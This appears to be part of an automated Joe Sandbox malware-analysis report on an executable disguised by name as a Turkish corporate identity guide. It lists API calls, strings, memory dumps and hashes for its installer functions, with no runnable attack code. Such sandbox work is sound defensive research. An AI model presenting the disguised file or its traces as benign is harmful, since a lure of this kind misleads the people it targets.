                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                                                                                                                                            • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                            • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                          • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                          • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040654E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe", xrefs: 0040654E
                                                                                                                                                                                          • *?|<>/":, xrefs: 004065A0
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040654F, 00406554
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 589700163-2981179581
                                                                                                                                                                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                          • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404298 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042F3
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040431E
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404348
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                          • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                          • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405322 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                          • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,76FC23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                          • lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                          • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                          • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404BEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                          • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D1635
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D163C
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F3D21EC,?,00000808), ref: 6F3D1650
                                                                                                                                                                                          • GetProcAddress.KERNEL32(!=o,00000000), ref: 6F3D1657
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D1660
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                          • String ID: !=o
                                                                                                                                                                                          • API String ID: 1148316912-2771720662
                                                                                                                                                                                          • Opcode ID: 0351744fde066b1d194bb50cd16fea4244fc44a68f77f1d16b04741af9402983
                                                                                                                                                                                          • Instruction ID: d38bc1425cebcd3207ba8d7106548f028f91bab0975480abe15c374ffed32520
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0351744fde066b1d194bb50cd16fea4244fc44a68f77f1d16b04741af9402983
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F0AC722065387BDA2117A6CC4CC9BBE9CEF8B2F5B110215F628E219086615D15DBF1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                          • MulDiv.KERNEL32(000B4BD5,00000064,000B4BD9), ref: 00402E3C
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                          • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                          • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 6F3D2569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6F3D121B: GlobalAlloc.KERNELBASE(00000040,?,6F3D123B,?,6F3D12DF,00000019,6F3D11BE,-000000A0), ref: 6F3D1225
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 6F3D2657
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 6F3D268C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35537090100.000000006F3D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F3D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35537038422.000000006F3D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537142179.000000006F3D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35537193155.000000006F3D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_6f3d0000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                          • Opcode ID: 38e29f3f7038767971b2a51e4e6daca98501ec4e1ccbb1f0ce20e045ec69ae39
                                                                                                                                                                                          • Instruction ID: 1f9286c5f1f6db75f3929150e7f02b7f97c39c46b006cbf509cac051ab9ebc9e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 38e29f3f7038767971b2a51e4e6daca98501ec4e1ccbb1f0ce20e045ec69ae39
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831CF73508601EFDB149F68DA94C2ABBBEFF87314714466DF541872A0C772E826CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                          • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                          • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsq53F5.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
